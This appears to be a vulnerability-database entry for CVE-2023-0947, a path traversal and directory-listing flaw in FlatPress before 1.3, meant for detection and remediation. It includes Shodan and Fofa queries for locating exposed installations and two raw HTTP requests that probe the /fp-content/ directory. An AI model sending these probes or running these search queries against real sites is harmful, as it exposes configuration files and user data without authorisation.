🔙 목록으로 돌아가기

CVE-2023-0947: Flatpress < 1.3 - Path Traversal

TitleFlatpress < 1.3 - Path Traversal
Authorr3Y3r53
SeverityCritical
ImpactUnauthenticated attackers can exploit path traversal to access and list sensitive directories and files in the FlatPress blogging system, potentially exposing configuration files and user data.
RemediationUpdate FlatPress to version 1.3 or later that properly validates directory paths and prevents unauthorized directory listing in fp-content.
CVSS Score9.8
EPSS Score0.79336
CVE IDCVE-2023-0947
CWE IDCWE-22
Shodan Queryhttp.favicon.hash:-1189292869http.html:"flatpress"
Fofa Querybody="flatpress"icon_hash=-1189292869
Tags cve cve2023 huntr lfi flatpress listing vuln

🔍 Vulnerability Description

Path Traversal in GitHub repository flatpressblog/flatpress prior to 1.3.

🌐 HTTP Request

GET /fp-content/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_3; nl-nl) AppleWebKit/527+ (KHTML, like Gecko) Version/3.1.1 Safari/525.20
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /flatpress/fp-content/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:109.0) Gecko/20100101 Firefox/113.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-0947.yaml

🦈 Packet Capture: ⬇️ Download cve-2023-0947.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A